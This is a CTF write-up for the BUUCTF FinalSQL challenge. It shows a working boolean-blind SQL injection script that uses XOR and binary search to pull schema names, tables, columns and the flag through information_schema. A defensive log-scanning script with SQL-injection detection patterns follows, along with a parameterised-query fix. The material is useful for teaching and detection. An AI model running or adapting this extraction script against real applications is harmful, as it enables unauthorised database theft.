BUUCTF [极客大挑战 2019]FinalSQL

Published 2023-09-05 15:11:10  Author: Amsterdamnit

Probing the site shows that the injection point is the id parameter of search.php.
Passing ?id=1^1 returns "ERROR!!!"; passing ?id=1^0 returns "NO! Not this! Click others~~~". XOR-ing the id with a condition therefore gives a two-state oracle: a true condition turns id=1 into 0 and produces the error page, a false one leaves it at 1.
This is boolean-based blind injection, so each character is recovered with a binary search over its ASCII value.

import requests
import time

url = "http://eab3a4cf-d57d-4236-a9f9-1383446ba4e1.node4.buuoj.cn:81/search.php?"

# One condition template per stage; run the stages one at a time by setting STAGE.
# 1^(cond) turns id=1 into 0 when cond is true, and the page then answers "ERROR!!!".
STAGES = {
    # database -> geek
    "db": "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)",
    # tables in geek -> Flaaaaag, F1naI1y (information_schema.tables filters on table_schema)
    "tables": "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)",
    # columns of F1naI1y -> fl4gawsla, password
    "columns": "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),%d,1))>%d)",
    # flag
    "flag": "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)",
}
STAGE = "flag"

result = ''
for i in range(1, 1000):
    low = 27
    high = 126
    # binary search: after the loop low == high == ascii value of character i
    while high > low:
        mid = (high + low) // 2
        time.sleep(0.1)
        r = requests.post(url, params={"id": STAGES[STAGE] % (i, mid)})
        # "ERROR" means the condition held, i.e. the ASCII code is greater than mid
        if 'ERROR' in r.text:
            low = mid + 1
        else:
            high = mid
    if low < 32:
        # past the end of the string: substr() returns '' and ascii('') is 0
        break
    result += chr(low)
    print(result)

print(result)

This yields flag{6657ba5b-f5b1-47a4-a41f-e270acfb48cb}
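From the defender's side, the same probe shape is easy to pick out of web-server logs. The following is an added example, not part of the original writeup: it parses Common Log Format access-log lines, percent-decodes the query string, and flags parameters that carry the XOR / ascii(substr(...)) / information_schema traits used above, counting probe requests per client. The log lines are constructed for the example; the /search.php path and id parameter come from the writeup, the client addresses, timestamps and sizes are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from the original post). The query
# strings reuse the probe shape from the writeup: id=1^1, then 1^(ascii(substr(...))>N).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2023:15:11:10 +0800] "GET /search.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [05/Sep/2023:15:11:11 +0800] "GET /search.php?id=1%5E1 HTTP/1.1" 200 48
10.0.0.5 - - [05/Sep/2023:15:11:12 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))%3E76) HTTP/1.1" 200 48
10.0.0.5 - - [05/Sep/2023:15:11:13 +0800] "GET /search.php?id=1%5E(ascii(substr((select(group_concat(password))from(F1naI1y)),3,1))%3E100) HTTP/1.1" 200 48
10.0.0.9 - - [05/Sep/2023:15:12:00 +0800] "GET /search.php?id=3 HTTP/1.1" 200 640
"""

# Indicators of the boolean-blind probes seen in the writeup. Each is a named
# regex so a finding can report which traits matched.
INDICATORS = {
    "numeric_xor": re.compile(r"^\s*\d+\s*\^"),          # 1^1, 1^0, 1^(...)
    "xor_group": re.compile(r"\^\s*\("),                  # 1^( ... )
    "char_extract": re.compile(r"ascii\s*\(\s*substr", re.I),
    "schema_read": re.compile(r"information_schema", re.I),
    "group_concat": re.compile(r"group_concat\s*\(", re.I),
}

# Common Log Format: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)


def parse_line(line):
    """Parse one access-log line into ip, path, decoded query parameters and size."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes values, so %5E becomes ^ and %3E becomes >
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"ip": m.group("ip"), "path": parts.path, "params": params, "size": int(m.group("size"))}


def suspicious_params(params):
    """Return [(param_name, [indicator names])] for every parameter matching an indicator."""
    hits = []
    for name, value in params.items():
        matched = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if matched:
            hits.append((name, matched))
    return hits


def scan_log(text):
    """Scan log text; return the list of findings and a per-IP count of probe requests."""
    findings = []
    per_ip = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec["params"])
        if hits:
            per_ip[rec["ip"]] += 1
            findings.append({"ip": rec["ip"], "path": rec["path"], "size": rec["size"], "hits": hits})
    return findings, per_ip


if __name__ == "__main__":
    findings, per_ip = scan_log(SAMPLE_LOG)
    for f in findings:
        print(f["ip"], f["path"], f["size"], f["hits"])
    print(dict(per_ip))
```

Two things stand out in the sample: every probe from 10.0.0.5 gets the same small response size (the oracle's fixed "ERROR!!!" or "NO! Not this!" page), and the binary search issues roughly seven such requests per recovered character, so a per-IP count on one endpoint climbs fast. The lasting fix for the application is to bind id as a query parameter so that a string like 1^(...) is never parsed as SQL at all.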
